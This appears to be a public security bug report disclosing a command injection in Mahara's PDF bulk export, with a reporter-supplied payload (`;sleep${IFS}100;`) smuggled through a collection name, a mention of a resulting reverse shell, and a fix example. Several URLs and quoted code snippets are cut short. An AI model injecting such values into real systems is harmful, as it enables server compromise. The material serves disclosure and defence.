Command injection vulnerability when PDF bulk export is enabled
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| Mahara | Fix Released | High | Unassigned | |
| 20.04 | Fix Released | High | Unassigned | |
| 20.10 | Fix Released | High | Unassigned | |
| 21.04 | Fix Released | High | Unassigned | |
Bug Description
Hi team, I hope you're doing well! When the experimental PDF export feature is enabled, a user can craft a malicious collection in Mahara and trigger the command injection issue when an admin exports the attacker's data (either specifically or by exporting the institution the attacker belongs to).
This was tested yesterday (2021-09-06) using the docker-compose file in the master branch of https:/
## Steps To Reproduce:
URLs will be using `http://
### Setup
1. Login as administrator
2. Go to the Plugin Administration page `http://
### Exploitation
1. As the attacker (normal user account), create a collection named `;sleep${IFS}100;`
2. As the administrator go to the bulk export page `http://
3. Choose `PDF files of pages and collections` as the export format
4. Set the attacker's username in `Usernames to export`
5. Click `Export Accounts` and observe the 100-second delay in processing
See the following section for a reverse shell example.
## Details
The issue comes from https:/
```php
if ($combiner == 'pdfunite') {
}
```
`$collectionname` is user controlled and the sanitization allows just enough characters to be able to inject commands.
https:/
```php
public static function text_to_
// truncates the text and replaces NOT allowed characters to hyphens
return preg_replace(
}
```
In the attached video the malicious collection name is
```bash
;cd$IFS`
```
and it triggered a reverse shell (see the attached video). Note that I had to install curl on my server to make it work, but that's likely to be present on a real system.
Suggested CVSS: AV:N/AC:
`AC:H` because of the setting that's likely to be disabled, `PR:L` because the payload is injected as a regular user, `UI:R` as it's triggered by an admin export, `S:C` as it impacts everything on the server once a reverse shell is obtained.
Let me know if you need anything else!
Dominic
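An added example, not Mahara's own code, of the defensive pattern that closes this class of bug: the collection name is reduced to an allowlisted filename (letters, digits, dot, underscore, hyphen only), and every argument of the `pdfunite` command line is wrapped in `escapeshellarg()` so nothing from the name is ever parsed by the shell. The function names, the `$inputs`/`$outdir` parameters and the `/tmp/export` paths are assumptions for illustration.

```php
<?php
// Added example (not Mahara's code). Builds a pdfunite command line in which a
// user-controlled collection name cannot be interpreted by the shell.

/**
 * Reduce a collection name to a conservative filename. This is an allowlist:
 * anything outside [A-Za-z0-9._-] becomes a hyphen, so shell metacharacters
 * such as ; $ { } ` and whitespace never survive, whatever the denylist missed.
 */
function collection_name_to_filename(string $name, int $maxlen = 50): string {
    $safe = preg_replace('/[^A-Za-z0-9._-]+/', '-', $name);
    // No leading dot (hidden file) and no dangling hyphens.
    $safe = trim($safe, '-.');
    if ($safe === '') {
        $safe = 'collection';
    }
    return substr($safe, 0, $maxlen);
}

/**
 * Assemble "pdfunite in1.pdf in2.pdf out.pdf". Each argument goes through
 * escapeshellarg(), so even if the allowlist above were weakened later the
 * name would still reach pdfunite as one literal argument.
 */
function build_pdfunite_command(array $inputs, string $collectionname, string $outdir): string {
    $parts = ['pdfunite'];
    foreach ($inputs as $in) {
        $parts[] = escapeshellarg($in);
    }
    $out = $outdir . '/' . collection_name_to_filename($collectionname) . '.pdf';
    $parts[] = escapeshellarg($out);
    return implode(' ', $parts);
}

// Constructed input: the collection name from the report above, plus
// hypothetical per-page PDFs that the export would have rendered.
$cmd = build_pdfunite_command(
    ['/tmp/export/page1.pdf', '/tmp/export/page2.pdf'],
    ';sleep${IFS}100;',
    '/tmp/export'
);
echo $cmd, PHP_EOL;
```

The name collapses to `sleep-IFS-100` and is single-quoted, so the delay described in the reproduction steps cannot occur; the same applies to the backtick payload from the video.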
| Field | Change |
|---|---|
| description | updated |
| status (mahara) | New → Confirmed |
| importance (mahara) | Undecided → High |
| milestone (mahara) | none → 21.10.0 |
| no longer affects | mahara/21.10 |
| information type | Private Security → Public Security |
I'm used to writing everything in Markdown; just for clarity, in step 1 of exploitation the backticks aren't part of the payload. The collection name is just ;sleep${IFS}100;